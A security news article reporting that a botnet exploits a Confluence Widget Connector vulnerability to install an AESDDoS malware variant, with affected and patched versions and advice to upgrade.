Atlassian Confluence under botnet attack

By

Upgrade to avoid AESDDoS malware infestations.

A large botnet is currently targetting vulnerable versions of Atlassian's Confluence collaboration server, and tries to abuse these for distributed denial of service attacks, remote code execution and crypto-currency mining, researchers warn.

Atlassian Confluence under botnet attack

Security vendor Trend Micro said its honeypots caught a variant of the AESDDoS malware that exploits a critical server-side template injection vulnerability in the Confluence Widget Connector macro.

Atlassian issued a security advisory on March 20, along with patches for Confluence Server and Confluence Data Centre. Versions 6.6.0-6.6.11, 6.7.0-6.12.2, 6.13.0-6.13.2 and 6.14.0-6.14.2 are all vulnerable, Atlassian said.

The fixed versions are 6.6.12, 6.12.3, 6.13.3 and 6.14.2 and later.

"A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance," Atlassian wrote in its security advisory.

Trend Micro said it saw an attacker exploit the vulnerability by remotely executing a shell command to download and run a malicious script; this would download another script that installed a variant of AESDDoS.

AESDDoS can launch an array of DDoS attacks and receive remote shell commands, as well as exfiltrate system information to be used by the malware variant to load crypto-currency miners onto infected machines.

The malware is also called Dofloo.iataq and Flooder-PI by other security vendors.

 

Got a news tip for our journalists? Share it with us anonymously here.
Copyright © iTnews.com.au . All rights reserved.
Tags:

Most Read Articles

Woolworths' CSO is Optus-bound

Woolworths' CSO is Optus-bound

Australia's super funds told to assess authentication controls

Australia's super funds told to assess authentication controls

Hackers abuse modified Salesforce app to steal data, extort companies

Hackers abuse modified Salesforce app to steal data, extort companies

The Northern Beaches Women's Shelter hones focus on tech-enabled abuse

The Northern Beaches Women's Shelter hones focus on tech-enabled abuse

Log In

  |  Forgot your password?